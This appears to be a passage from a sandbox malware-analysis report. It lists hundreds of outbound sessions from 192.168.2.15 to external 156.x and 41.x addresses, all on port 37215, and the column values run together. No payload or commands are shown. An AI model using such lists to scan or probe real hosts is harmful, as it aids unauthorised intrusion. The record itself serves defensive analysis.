                                                                            16137192.168.2.1544704156.236.48.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16138192.168.2.1554546156.38.136.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16139192.168.2.1542454156.35.231.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16140192.168.2.1550814156.184.60.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16141192.168.2.1558388156.109.225.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16142192.168.2.1537186156.247.239.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16143192.168.2.1543968156.40.176.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16144192.168.2.1533378156.196.80.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16145192.168.2.1541844156.192.201.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16146192.168.2.1540132156.22.120.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16147192.168.2.1539680156.206.152.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16148192.168.2.1544390156.8.45.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16149192.168.2.1541144156.221.146.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16150192.168.2.1556322156.84.236.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16151192.168.2.1538384156.166.232.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16152192.168.2.1537990156.69.149.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16153192.168.2.1554144156.233.230.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16154192.168.2.1550554156.13.163.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16155192.168.2.1546642156.58.220.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16156192.168.2.1540286156.137.204.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16157192.168.2.1551552156.99.51.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16158192.168.2.1548664156.162.25.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16159192.168.2.1538714156.67.60.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16160192.168.2.1533978156.222.176.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16161192.168.2.1555014156.201.117.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16162192.168.2.1558516156.162.79.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16163192.168.2.1546074156.54.28.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16164192.168.2.1546716156.156.139.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16165192.168.2.1553996156.66.142.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16166192.168.2.1558656156.141.117.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16167192.168.2.1536790156.95.162.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16168192.168.2.1534582156.116.94.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16169192.168.2.1539554156.141.92.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16170192.168.2.1534682156.88.84.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16171192.168.2.1551624156.140.6.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16172192.168.2.1538624156.211.206.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16173192.168.2.1547334156.49.129.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16174192.168.2.1546416156.64.255.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16175192.168.2.1540440156.67.164.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16176192.168.2.1554490156.15.176.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16177192.168.2.1533786156.229.50.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16178192.168.2.1559760156.167.159.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16179192.168.2.1558070156.33.117.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16180192.168.2.1560804156.39.49.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16181192.168.2.1533436156.141.231.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16182192.168.2.1550692156.173.170.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16183192.168.2.1558342156.222.206.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16184192.168.2.1544270156.238.252.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16185192.168.2.1548504156.52.85.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16186192.168.2.1535564156.158.40.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16187192.168.2.1545246156.67.68.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16188192.168.2.1545364156.229.28.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16189192.168.2.1540000156.78.124.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16190192.168.2.154645641.216.100.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16191192.168.2.154284641.250.77.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16192192.168.2.155055041.49.101.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16193192.168.2.153506241.186.181.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16194192.168.2.154997841.159.121.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16195192.168.2.155956641.155.52.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16196192.168.2.153810041.9.115.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16197192.168.2.153679841.70.193.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16198192.168.2.153862641.41.211.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16199192.168.2.153906241.133.187.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16200192.168.2.153806441.131.52.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16201192.168.2.154468841.241.81.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16202192.168.2.154792241.213.26.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16203192.168.2.153814241.77.116.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16204192.168.2.155015441.149.87.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16205192.168.2.153734241.45.147.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16206192.168.2.153729641.238.14.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16207192.168.2.154214241.144.158.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16208192.168.2.153975041.3.39.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16209192.168.2.155358641.143.123.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16210192.168.2.154116241.161.126.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16211192.168.2.154274241.127.186.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16212192.168.2.155917241.19.215.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16213192.168.2.154959641.183.1.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16214192.168.2.155495641.177.255.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16215192.168.2.155912441.231.24.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16216192.168.2.155220041.70.223.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16217192.168.2.154702841.33.163.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16218192.168.2.154254841.166.223.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16219192.168.2.153411641.128.168.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16220192.168.2.154945241.231.26.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16221192.168.2.155966441.71.206.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16222192.168.2.154252441.132.233.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16223192.168.2.154838041.112.107.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16224192.168.2.154273441.83.108.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16225192.168.2.154144041.241.128.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16226192.168.2.154077841.125.209.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16227192.168.2.155839441.40.195.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16228192.168.2.154832241.167.87.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16229192.168.2.154688441.83.89.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16230192.168.2.154024441.127.143.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16231192.168.2.155332441.161.251.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16232192.168.2.156018441.45.46.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16233192.168.2.154976441.157.91.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16234192.168.2.153285841.158.252.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16235192.168.2.154268641.31.21.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16236192.168.2.155656841.86.74.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16237192.168.2.154496041.206.231.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16238192.168.2.155371041.239.192.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16239192.168.2.154513441.21.75.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16240192.168.2.154406841.100.119.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16241192.168.2.154300241.76.60.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16242192.168.2.153909841.164.62.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16243192.168.2.154273041.228.27.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16244192.168.2.156021041.37.157.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16245192.168.2.155350841.96.7.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16246192.168.2.155570841.218.33.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16247192.168.2.154393041.59.67.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16248192.168.2.155919641.86.144.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16249192.168.2.154564841.91.7.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16250192.168.2.153514441.86.46.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16251192.168.2.155634841.173.88.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16252192.168.2.155706841.88.5.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16253192.168.2.154996241.69.21.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16254192.168.2.155700841.182.58.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16255192.168.2.154156041.95.15.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16256192.168.2.155455241.203.233.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16257192.168.2.154001441.53.9.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16258192.168.2.155990841.146.74.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16259192.168.2.154209241.255.134.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16260192.168.2.154446041.231.226.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16261192.168.2.155085441.10.155.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16262192.168.2.153326641.118.246.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16263192.168.2.155409841.31.48.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16264192.168.2.154958241.12.182.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16265192.168.2.155716841.28.156.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16266192.168.2.155644041.62.30.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16267192.168.2.156097041.28.154.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16268192.168.2.154705841.80.114.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16269192.168.2.154281641.74.218.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16270192.168.2.154513641.147.165.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16271192.168.2.155582041.233.112.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16272192.168.2.154641041.58.109.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16273192.168.2.155743041.130.48.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16274192.168.2.153980641.196.25.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16275192.168.2.154599241.66.46.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16276192.168.2.154742841.176.194.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16277192.168.2.154548841.40.34.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16278192.168.2.154099041.90.136.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16279192.168.2.153511441.181.1.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16280192.168.2.155357241.85.98.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16281192.168.2.154119441.163.134.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16282192.168.2.154119241.109.189.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16283192.168.2.155700641.158.86.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16284192.168.2.154657241.33.3.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16285192.168.2.154144041.222.20.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16286192.168.2.155610041.175.103.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16287192.168.2.154634841.155.187.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16288192.168.2.155116641.146.62.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16289192.168.2.153896241.66.248.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16290192.168.2.155215241.247.254.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16291192.168.2.154856641.145.59.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16292192.168.2.154642241.2.187.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16293192.168.2.154914041.213.142.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16294192.168.2.155437441.167.198.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16295192.168.2.153411441.16.33.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16296192.168.2.155138041.218.71.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16297192.168.2.153355441.181.155.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16298192.168.2.154706841.35.88.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16299192.168.2.155600641.114.202.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16300192.168.2.154449041.53.120.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16301192.168.2.155540041.98.214.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16302192.168.2.155864241.52.169.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16303192.168.2.153660041.154.161.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16304192.168.2.155626241.75.103.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16305192.168.2.155368641.202.44.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16306192.168.2.153607841.28.6.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16307192.168.2.155545441.72.238.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16308192.168.2.155737641.37.99.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16309192.168.2.155420641.76.130.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16310192.168.2.155322641.122.207.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16311192.168.2.155094041.172.229.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16312192.168.2.155587241.121.91.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16313192.168.2.154973841.209.214.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16314192.168.2.153719841.59.5.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16315192.168.2.154732041.219.130.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16316192.168.2.154822041.250.141.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16317192.168.2.154395641.227.76.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16318192.168.2.154743041.232.68.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16319192.168.2.154280241.195.246.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16320192.168.2.155000641.121.243.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16321192.168.2.154003641.194.194.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16322192.168.2.155142041.71.59.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16323192.168.2.155146841.160.179.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16324192.168.2.153776841.123.191.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16325192.168.2.155108041.120.122.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16326192.168.2.155310841.232.245.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16327192.168.2.155345441.213.230.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16328192.168.2.155758641.76.115.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16329192.168.2.155584241.217.150.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16330192.168.2.153376441.135.132.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16331192.168.2.153871041.44.53.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16332192.168.2.154865041.176.136.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16333192.168.2.155448841.43.35.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16334192.168.2.155403241.40.46.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16335192.168.2.153615641.227.225.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16336192.168.2.155067841.181.86.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16337192.168.2.153530441.58.196.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16338192.168.2.153772841.22.70.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
